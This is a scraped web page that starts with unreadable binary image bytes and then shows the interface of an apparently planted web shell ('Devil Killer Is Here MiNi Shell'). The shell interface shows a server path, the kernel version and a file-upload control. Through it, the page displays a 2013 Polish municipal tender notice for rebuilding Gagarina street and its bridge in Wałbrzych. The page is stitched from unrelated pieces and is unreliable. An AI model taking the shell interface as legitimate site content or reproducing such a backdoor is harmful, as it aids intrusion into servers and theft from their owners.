JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131120/474982-N-2013.html

<p class="kh_header"><b>Wałbrzych: Przebudowa ulic Gagarina i Lelewela w Wałbrzychu etap I: ulica Gagarina wraz z obiektem mostowym</b><br>
<b>Numer ogłoszenia: 474982 - 2013; data zamieszczenia: 20.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wałbrzych - Zarząd Dróg, Komunikacji i Utrzymania Miasta w Wałbrzychu , ul. Matejki 1, 58-300 Wałbrzych, woj. dolnośląskie, tel. 74 6414400, 6414408, faks 74 6414404.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdkium.walbrzych.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa Gminy Wałbrzych.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ulic Gagarina i Lelewela w Wałbrzychu etap I: ulica Gagarina wraz z obiektem mostowym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem umowy jest Przebudowa ulic Gagarina i Lelewela w Wałbrzychu etap I: ulica Gagarina wraz z obiektem mostowym realizowana w ramach zadania budżetowego pn. Przebudowa ulic Gagarina i Lelewela w Wałbrzychu.
2. Zakres umowy obejmuje w szczególności:
- opracowaniu tymczasowej Organizacji Ruchu na czas prowadzenia robót;
- przebudowa i poszerzenie jezdni (nowa konstrukcja jezdni),
- przebudowa i budowa chodnika,
- budowa ścieżki rowerowej,
- przebudowa i budowa zatok autobusowych,
- przebudowa istniejących zjazdów,
- umocnienie skarp,
- przebudowa gruntowej drogi dojazdowej,
- przebudowa mostu drogowego na rzece Pełcznica,
- przebudowa sieci kanalizacji deszczowej, budowa nowych odcinków sieci,
- przebudowa oświetlenia drogowego,
- przebudowa schodów w obszarze inwestycji,
- likwidacja kolizji branżowych,
- wykonanie docelowej organizacji ruchu, oznakowanie poziome i pionowe,
- wycinka drzew kolidujących z przebiegiem projektowanej drogi i infrastruktury,
- koordynacji prowadzenia remontu sieci wodociągowej, gazowniczej.
Wykonawca zobowiązany jest uwzględnić konieczność utrzymania ruchu pieszego, dojść i dojazdów do posesji oraz dojazdów do zakładów przemysłowych na ulicy Gagarina. Zamawiający zobowiązuje się do zimowego utrzymania odcinków drogi dopuszczonych do ruchu publicznego (zgodnie z projektem Tymczasowej Organizacji Ruchu). W trakcie prowadzenia prac przez Wykonawcę wykonywane będą przez właścicieli sieci (gazowa i wodociągowa) remonty poszczególnego uzbrojenia. Do obowiązków Wykonawcy należy koordynacja ww. prac. 
Szczegółowy zakres rzeczowy przedmiotu zamówienia określają Dokumentacje Projektowe, Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych oraz Przedmiar robót - formularz cenowy. 
UWAGA: cena ofertowa ma obejmować wszystkie pozycje przedmiaru robót za wyjątkiem rozdz. XV Gazociąg, rozdz. XVI Wodociąg, tj. od poz. 235 do poz. 267 - zakres realizowany przez gestorów sieci.  
3. W zakresie obowiązków Wykonawcy znajduje się także:
1) wykonania robót zgodnie z obowiązującymi przepisami Prawa budowlanego, aktami prawnymi właściwymi w przedmiocie zamówienia, przepisami techniczno - budowlanymi, obowiązującymi normami oraz zasadami wiedzy budowlanej,
2) uzyskania niezbędnych do wykonania zamówienia, uzgodnień, opinii, zatwierdzeń i postanowień, w ramach ceny ofertowej określonej w § 11 ust. 2 umowy,
3) uzyskania uzgodnień z właścicielami gruntów, które nie są w zarządzie Zamawiającego,  (jeśli zaistnieje taka potrzeba np. dla zaplecza budowy),
4) opracowania projektu organizacji ruchu zastępczego na czas prowadzenia robót łącznie z uzgodnieniami  i zatwierdzeniem zgodnie z:
a) rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U. Nr 220, poz. 2181 ze zm.),
b) rozporządzeniem Ministra Infrastruktury z dnia 23 września 2003 r. w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonania nadzoru nad tym zarządzaniem (Dz. U. Nr 177, poz.1729 ze zm.),
5) zapewnienia nadzoru autorskiego w zakresie opracowanej przez siebie dokumentacji projektowej organizacji ruchu na czas budowy,
6) zorganizowanie zaplecza budowy w miejscu uzgodnionym z Zamawiającym. Zaplecze  winno być wyposażone w pomieszczenie, w którym będzie można przeprowadzać rady budowy,
7) urządzenia terenu budowy, zorganizowania, utrzymania i zlikwidowania po zakończeniu robót budowlanych zaplecza budowy wraz z zasileniem w energię elektryczną i wodę (według własnych potrzeb). Na zapleczu budowy Wykonawca udostępni stanowisko dla Inspektorów Nadzoru, wyposażone w podstawowe meble, tj. biurko, krzesła itp. Po zakończeniu robót teren, na którym będzie zlokalizowane zaplecze budowy należy niezwłocznie przywrócić do stanu pierwotnego,
8) oznakowania terenu budowy tablicą informacyjną,
9) wykonania i utrzymania w należytej sprawności oznakowania i zabezpieczenia terenu budowy,
10) utrzymania terenu budowy i zaplecza budowy w stanie gwarantującym bezpieczeństwo osób korzystających z tych terenów,
11) umożliwienia przejazdu (zaopatrzenie, służby komunalne, służby ratownicze itp.), dojazdu i dojścia do wszystkich obiektów zlokalizowanych w rejonie budowy. Wszelkie prace na i w bezpośrednim sąsiedztwie obiektów należy wykonywać w uzgodnieniu 
z właścicielami lub administratorami tych obiektów. Prace na czynnych sieciach należy wykonać pod nadzorem właścicieli tych sieci,
12) po przejęciu terenu budowy demontaż, zabezpieczenie i przechowanie urządzeń wyposażenia pasa drogowego stanowiącego majątek Gminy Wałbrzych, tj. m.in.: istniejące oznakowanie pionowe, elementy zabezpieczenia ruchu i inne wyposażenie pasa drogowego. Przed protokolarnym przekazaniem terenu budowy Wykonawca wykona na terenie przyszłych robót inwentaryzację majątku drogowego Gminy obejmującą wszystkie materiały i urządzenia stanowiące wyposażenie pasa drogowego. Inwentaryzacja podlegać będzie weryfikacji Zamawiającego,
13) zawiadomienie pisemne wszystkich właściwych instytucji (w szczególności służb medycznych i ratunkowych oraz policji i straży pożarnej) o terminach rozpoczęcia robót i wprowadzeniu zmian w organizacji ruchu z minimum 7-dniowym wyprzedzeniem,
14) wykonywania prac utrzymaniowych (w ramach ceny ofertowej określonej w § 11 ust. 2 umowy) na czynnych, ogólnodostępnych drogach i chodnikach przebiegających przez teren budowy z wyjątkiem zimowego utrzymania odcinków drogi dopuszczonych do ruchu publicznego. Wykonawca jest odpowiedzialny za przejezdność i bezpieczeństwo ogólnodostępnego ruchu drogowego i pieszego prowadzonego po terenie budowy, zgodnie 
z zatwierdzoną organizacją ruchu, 
15) sporządzenia planu bezpieczeństwa i ochrony zdrowia, zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. Nr 120, poz. 1126) oraz wymaganiami Prawa budowlanego,
16) poniesienia kosztów związanych z wypłatą odszkodowań za wszelkie zniszczenia, które powstaną w związku z wykonywaniem przedmiotu umowy. Wykonawca ponosi pełną odpowiedzialność za wypadki i szkody powstałe w związku z nieprawidłowym oznakowaniem terenu budowy oraz wykonaniem i wykonywaniem przedmiotu zamówienia, a także szkody osób trzecich wynikające z organizacji i sposobu prowadzenia robót. Obowiązkiem Wykonawcy będzie stałe monitorowanie spraw związanych z usuwaniem powstałych szkód oraz informowanie Zamawiającego, w odstępach czasowych nie dłuższych niż 14 dni, o postępie rozpatrywania sprawy przez ubezpieczyciela,
17) prowadzenia robót zgodnie z zatwierdzonym harmonogramem robót,
18) przestrzegania norm w zakresie ochrony środowiska naturalnego,
19) koordynowania robót, ochrony mienia, zabezpieczenia p. poż., nadzoru BHP i utrzymania ogólnego porządku na terenie budowy,
20) protokolarnego przekazania terenu budowy po zakończeniu robót w stanie uporządkowanym oraz demontażu ewentualnych obiektów tymczasowych, nie później niż w dniu odbioru ostatecznego robót,
21) zapewnienia bieżącej obsługi geodezyjnej łącznie z geodezyjną inwentaryzacją powykonawczą wszystkich robót, zatwierdzoną przez właściwy ośrodek dokumentacji geodezyjno-kartograficznej,
22) organizowania, co najmniej 2 raz w miesiącu, rad budowy z udziałem Zamawiającego oraz inspektorów nadzoru. Przygotowywanie cotygodniowych raportów z postępu robót oraz protokołowanie treści uzgodnień z narad i dla wszystkich stron spotkań,
23) utrzymanie i pielęgnacja zieleni przez okres dwóch lat od daty odbioru inwestycji zgodnie z zapisami dokumentacji projektowej TOM XI Projekt zieleni oraz SSTWiORB Tom XVII-A D-09.01.01- zieleń drogowa.
24) ochrony punktów geodezyjnych oraz ich odtworzenie w przypadku ich zniszczenia,
25) dokonanie pomiaru geodezyjnego położenia rzędnej wysokościowej końcowego (zaślepionego) odcinka wyprowadzonego przyłącza kanalizacji deszczowej,
26) sporządzenie harmonogramu rzeczowo - finansowego uwzględniającego prace prowadzone przez właścicieli poszczególnych sieci (zwanym w niniejszej umowie także harmonogramem robót),
27) sporządzenie Programu Zapewnienia Jakości,
28) spełnianie wymogów określonych w uzgodnieniach dokumentacji projektowej, a w przypadku ich wygaśnięcia wystąpienie do gestora sieci o przedłużenie,
29) pokrycie kosztów obsługi budowy przez inspektorów zewnętrznych  (przedstawiciele gestorów sieci)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.20.00.00-9, 45.23.00.00-8, 45.23.30.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem udziału w postępowaniu o udzielenie zamówienia publicznego jest wniesienie wadium w wysokości 80 000,00 zł (słownie: osiemdziesiąt tysięcy złotych zero groszy).
2.Wadium może być wniesione w sposób przewidziany w art. 45 ust. 6 Ustawy. Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Zamawiającego - nr  30 1030 1289 0000 0000 9000 3208 z zaznaczeniem na przelewie: Wadium przetargowe -Przebudowa ulic Gagarina i Lelewela w Wałbrzychu - etap I:ulica Gagarina wraz z obiektem mostowym.
3.W przypadku wadium wnoszonego w pieniądzu za skutecznie wniesione Zamawiający uzna wadium, które w oznaczonym terminie w dniu otwarcia ofert znajduje się na rachunku Zamawiającego. Do oferty należy dołączyć kopię dokumentu potwierdzającego wpłatę wadium.
4.W przypadku wnoszenia wadium w innej formie niż pieniężna oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć wraz z ofertą w kopercie, jednakże dokumentu nie należy spinać trwale z ofertą.
5.Z treści gwarancji winno wynikać bezwarunkowe, nieodwołalne i płatne w ciągu 14 dni na pierwsze pisemne żądanie Zamawiającego, w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust. 5 Ustawy. Prosimy nie załączać oryginału dokumentu wadialnego do oferty.
6.Wykonawca, który nie zabezpieczy oferty akceptowalną formą wadium na wymagany okres związania ofertą wg zasad określonych w niniejszym punkcie zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał (zakończył) co najmniej dwa zadania o wartości min. 4 500 000,00 zł brutto każde, obejmujące remont, przebudowę lub budowę ulicy, drogi klasy minimum L, wraz z budową, przebudową, remontem  kanalizacji deszczowej, oświetlenia ulicznego oraz jednej z sieci infrastruktury uzbrojenia podziemnego: sieci wodociągowej, gazowniczej, teletechnicznej, kanalizacji sanitarnej, NN i SN. W tym co najmniej jedno obejmujące budowę, przebudowę, remont  obiektu mostowego usytuowanego w ciągu drogi klasy L.
Przez jedno zadanie  Zamawiający rozumie robotę budowlaną wykonaną na podstawie jednej umowy lub w ramach jednego zamówienia.
Ocena, czy Wykonawca spełnia warunki udziału w postępowaniu zostanie dokonana zgodnie z kryterium spełnia - nie spełnia, na podstawie analizy załączonych do oferty oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub ma możliwość dysponowania osobami zdolnymi do wykonania zamówienia, tj.:
A.  Kierownikiem Budowy:
a) posiadającym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń, wymagane przepisami ustawy z dnia 7 lipca 1994 r. - Prawo budowlane oraz  zgodnie z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28  kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie, lub im odpowiadające ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
b) będącym członkiem właściwej Okręgowej Izby Inżynierów Budownictwa (posiadającym aktualne zaświadczenie o przynależności do OIIB i aktualne ubezpieczenie odpowiedzialności cywilnej),
c) minimum 5 lat pracy w charakterze Kierownika Budowy przy prowadzeniu i rozliczaniu zadań polegających na budowie, przebudowie lub remoncie ulicy, drogi klasy min. L, wraz z  budową, przebudową, remontem  kanalizacji deszczowej, oświetlenia drogowego oraz minimum jedną z następujących branż infrastruktury uzbrojenia podziemnego: sieć wodociągowa, gazownicza, teletechniczna, kanalizacja sanitarna oraz NN i SN.
B. Kierownik robót branży mostowej
a) posiadającym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności mostowej bez ograniczeń, wymagane przepisami ustawy z dnia 7 lipca 1994 r. - Prawo budowlane oraz  zgodnie z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28  kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie, lub im odpowiadające ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
b) będącym członkiem właściwej Okręgowej Izby Inżynierów Budownictwa (posiadającym aktualne zaświadczenie o przynależności do OIIB i aktualne ubezpieczenie odpowiedzialności cywilnej),
c) posiadającym minimum 3 lata pracy w charakterze Kierownika budowy i, lub kierownika robót branży mostowej przy prowadzeniu i rozliczaniu zadań polegających na budowie, przebudowie lub remoncie obiektu mostowego usytuowanego w ciągu drogi klasy L.
C. Kierownikiem robót w specjalności instalacyjnej:
a) posiadającym uprawnienia budowlane do kierowania robotami budowlanymi   w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, wymagane przepisami ustawy z dnia 7 lipca 1994 r. - Prawo budowlane oraz  zgodnie z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28  kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie, lub im odpowiadające ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
b) będącym członkiem właściwej Okręgowej Izby Inżynierów Budownictwa (posiadającym aktualne zaświadczenie o przynależności do OIIB i aktualne ubezpieczenie odpowiedzialności cywilnej),
c) posiadającym minimum 3 lata pracy w charakterze Kierownika budowy i, lub kierownika robót branży sanitarnej przy prowadzeniu i rozliczaniu zadań polegających na budowie, przebudowie lub remoncie ulicy, drogi klasy min. L, wraz z budową, przebudową, remontem  kanalizacji deszczowej, oświetlenia drogowego oraz minimum jedną z następujących branż infrastruktury uzbrojenia podziemnego: sieć wodociągowa, gazownicza, teletechniczna, kanalizacja sanitarna oraz NN i SN.
D. Kierownikiem robót w specjalności elektrycznej:
a) posiadającym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności elektrycznej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, wymagane przepisami ustawy z dnia 7 lipca 1994 r. - Prawo budowlane  oraz  zgodnie z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie, lub im odpowiadające ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
b) będącym członkiem właściwej Okręgowej Izby Inżynierów Budownictwa (posiadającym aktualne zaświadczenie o przynależności do OIIB i aktualne ubezpieczenie odpowiedzialności cywilnej),
c) posiadającym min. 3 lata pracy w charakterze Kierownika budowy i, lub kierownika robót branży elektrycznej przy prowadzeniu i rozliczaniu zadań polegających na budowie, przebudowie lub remoncie ulicy, drogi klasy min. L, wraz z budową, przebudową, remontem  kanalizacji deszczowej, oświetlenia drogowego oraz minimum jedną z następujących branż infrastruktury uzbrojenia podziemnego: sieć wodociągowa, gazownicza, teletechniczna, kanalizacja sanitarna oraz NN i SN.
E. Kierownikiem robót w specjalności telekomunikacyjnej:
a) posiadającym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności telekomunikacyjnej bez ograniczeń, wymagane przepisami ustawy z dnia  7 lipca 1994 r. - Prawo budowlane oraz zgodnie z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych  w budownictwie, lub im odpowiadające ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
b) będącym członkiem właściwej Okręgowej Izby Inżynierów Budownictwa (posiadającym aktualne zaświadczenie o przynależności do OIIB i aktualne ubezpieczenie odpowiedzialności cywilnej),
c) posiadającym min. 3 lata pracy w charakterze Kierownika budowy i, lub kierownika robót branży telekomunikacyjnej przy prowadzeniu i rozliczaniu zadań polegających na budowie, przebudowie lub remoncie ulicy, drogi klasy min. L, wraz z budową, przebudową, remontem  kanalizacji deszczowej, oświetlenia drogowego oraz sieci teletechnicznej.
Ocena, czy Wykonawca spełnia warunki udziału w postępowaniu zostanie dokonana zgodnie z kryterium spełnia - nie spełnia, na podstawie analizy załączonych do oferty oświadczeń i dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>W ww. wykazie należy wskazać co najmniej dwa zadania o wartości 
min. 4 500 000,00 zł brutto każde, obejmujące remont, przebudowę lub budowę ulicy, drogi klasy minimum L, wraz z budową, przebudową, remontem  kanalizacji deszczowej, oświetlenia ulicznego oraz jednej z sieci infrastruktury uzbrojenia podziemnego: sieci wodociągowej, gazowniczej, teletechnicznej, kanalizacji sanitarnej, NN i SN. W tym co najmniej jedno obejmujące budowę, przebudowę, remont  obiektu mostowego usytuowanego w ciągu drogi klasy L.
Przez jedno zadanie  Zamawiający rozumie robotę budowlaną wykonaną na podstawie jednej umowy lub w ramach jednego zamówienia.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

